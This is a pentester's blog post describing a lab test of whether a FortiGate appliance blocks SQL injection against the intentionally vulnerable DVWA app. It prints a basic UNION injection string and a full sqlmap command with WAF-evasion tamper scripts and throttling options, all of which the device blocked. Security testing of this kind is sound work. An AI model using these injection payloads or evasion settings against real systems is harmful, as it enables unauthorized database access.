Hacking Fortinet – SQLI test (English Version)

fortinet-8To follow me on Facebook and Twitter  know that I recently had a special curiosity in Fortinet, because is one of the security devices that have the greatest positioning in the region.

Another aspect is that in my projects pentest, when I said that the device was present protecting the servers, I never had trouble with block performing attacks.

Last week with my friend Alexis Torres  colleague area pentest and specialist on Fortinet solutions, making some offensive security testing to validate the security rules when the device protects a web application attacks

For testing use a properly configured Appliance FortiGate D60 ,

whether the team actually blocking attacks when protecting a Web application, the configuration perform to Alexis  (fortiner specialist solutions) the idea was to make rigorous testing.

FortinetThe test consisted, one vulnerable web application as DVWA which was protected by a D60 Appliance Fortinet.

fortinetDeveloping Attacks:

As you know SQL vulnerabilities Inyection (SQLI) are the most common in web applications, this will be validated as they are in first place in the Owasp top 10.

Then with the vulnerable application (DVWA) first we perform very simple attacks SQLI

‘ union select 1 —

Surprise, the Fortinet detected pattern SQL, and blocked.

FortinetThe rule that detected the attack was “http.uri.sql.injectionobviously does not say much about its inner workings and to be a well kept secret by the brand.

fortinet

We do not give up and and develop more elaborate attacks with SQLMAP tool par excellence will develop SQLI.

However it was obvious, if the attack sqlmap sent without customization,   It would be easy prey for Fortinet.

Add some modifications to the attack:

speed:

–threads = 1, we adjusted the maximum number of applications 1
–delay = 60, delay in shipment of 60 seconds each sqli

obfuscation

–technique U, we specify the technique based on UNION QUERY
–batch obviate the entry of Y / N
–tamper, we specify the script type used as payload to obfuscate the strings sqli

sqlmap have a wide variety as in pharmacy:

space2hash.py
space2morehash.py
space2mssqlblank.py
space2mysqlblank.pycharencode.py
chardoubleencode.py
charunicodeencode.py

the syntax of the attack sent is :

python sqlmap.py –url=”http://192.168.19.253/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”security=low; PHPSESSID=d0fa0f05f0b714c18b3ba3ebace3f450″ -v 3 –dbms “MySQL” –technique U -p id –batch –threads=1 –delay=60 –tamper “space2mysqldash.py”

After a long time, because as we indicated, we lower the speed of the attack, surprise surprise the device detected the attack and blocking for each existing payloads with sqlmap.

fortinet-sqlmap
fortinet-sqlmap

Well, obviously it was a good result for Alexis but not for me in my position attacker, but from the perspective of protection, it is good to know that the device does the job, although it is necessary to consider these factors:

1. Proper configuration
As I indicated developed tests with a specialist brand, but not only enabling or disabling rules or configurations, as most companies / implementers.

It is also important that a specialist in attacks make the other part of the escenario (Ofensive test), so it is possible to have both sides of the stage, safety tests developed offensive and defensive and thus ensure that the configuration is appropriate.


2.
Regarding tests
From the perspective of pentester is not possible to assume a position that the device has the perfect security, about SQLI, considering that a Web application well known on issues of insecurity , but in this scenario was effective, should be more testing and other web scenarios to feel more satisfied.

In the future I hope to develop other security offensive tests as XSS , Session Hijacking, among others.

greetings
Juan Oliva
@jroliva

 

 

 

Anuncios
Esta entrada fue publicada en Manuales y tutoriales por jroliva. Guarda el enlace permanente.

Acerca de jroliva

Juan Oliva, es un consultor de seguridad informática y telefonía IP con 10 años de experiencia en el campo . Muy involucrado en proyectos de pruebas de penetración , análisis y explotación vulnerabilidades, pruebas de ingeniería social, seguridad física, revisión de código, entre otras tareas de seguridad informática. Así mismo, desarrolla proyectos de implementación y mantenimiento de VoIP, basadas en Asterisk y Elastix, proyectos de callcenter, soluciones en la nube y hosted PBX, Aseguramiento de plataformas Linux, Windows. Ha estado trabajando para una variedad de empresas en donde ha desarrollado proyectos para el estado peruano, así como para entidades privadas, nacionales y del extranjero, cuenta con certificaciones vigentes en Ethical hacking, Linux y telefonía IP. Es instructor de cursos de Ethical Hacking y certificaciónes como Linux Professional Institute y Elastix, donde ha tenido oportunidad de realizar capacitaciones en el Perú, así como en el extranjero. Es investigador de vulnerabilidades, y creador de contenidos, que son publicados en su blog personal jroliva.wordpress.com el cual mantiene desde hace mas de 6 años.

Un pensamiento en “Hacking Fortinet – SQLI test (English Version)

  1. Pingback: Hacking fortinet – bypassing UTM (English version) | Juan Oliva

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s